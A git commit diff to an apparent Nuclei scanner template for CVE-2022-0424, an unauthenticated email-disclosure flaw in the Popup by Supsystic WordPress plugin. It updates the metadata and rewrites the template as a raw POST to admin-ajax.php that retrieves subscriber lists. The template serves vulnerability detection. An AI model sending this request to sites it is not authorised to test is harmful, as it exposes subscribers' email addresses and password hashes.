updated matchers, info & req type

2024-04-11 10:10:31 +05:30 · 2024-04-11 10:10:31 +05:30 · 97864a8e5f
parent ea437826b6
commit 97864a8e5f
1 changed files with 23 additions and 20 deletions
--- a/http/cves/2022/CVE-2022-0424.yaml
+++ b/http/cves/2022/CVE-2022-0424.yaml
@ -1,13 +1,14 @@
 id: CVE-2022-0424
+
 info:
-  name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
+  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: Kazgangap
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
@ -17,32 +18,34 @@ info:
    epss-percentile: 0.34103
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
    vendor: supsystic
    product: popup
    framework: wordpress
-  tags: wpscan
+  tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup

 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php"
-    headers:
-      Content-Length: "104"
-      Accept: "application/json, text/javascript, */*; q=0.01"
-      X-Requested-With: "XMLHttpRequest"
-      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
-      Accept-Encoding: "gzip, deflate"
-      Accept-Language: "en-US,en;q=0.9"
-      Connection: "close"
-    body: |
-      page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
+
    matchers-condition: and
    matchers:
      - type: word
        words:
-          - '"id":"1","username"'
-          - 'email'
-          - 'hash'
+          - '"id":"'
+          - 'username":"'
+          - 'email":'
+          - 'hash":"'
+          - '_wpnonce'
+        condition: and
+
      - type: status
        status:
          - 200